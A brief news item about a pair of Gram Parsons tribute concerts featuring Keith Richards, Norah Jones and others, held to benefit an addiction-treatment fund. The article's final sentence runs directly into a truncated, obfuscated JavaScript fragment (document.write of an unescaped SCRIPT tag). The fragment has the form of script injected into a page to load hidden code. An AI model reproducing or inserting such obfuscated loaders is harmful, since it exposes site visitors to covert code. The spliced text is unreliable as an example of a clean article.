Keith Richards has joined the lineup of a pair of concerts in tribute to country-rock pioneer Gram Parsons.
Also on the lineup is Norah Jones, Steve Earle, Dwight Yoakam and Lucinda Williams. The shows will be held July ninth in Santa Barbara, California, and July tenth in Los Angeles.
Proceeds will benefit the Musicians' Assistance Program, which helps members of the music industry pay for drug and alcohol addiction treatment.
The tribute is because of Richards, in a way. Parsons' daughter, Polly, decided to organize the concerts after she had a conversation with Richards two years ago, during which Richards told her she was the last bit of her father left on the planet.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
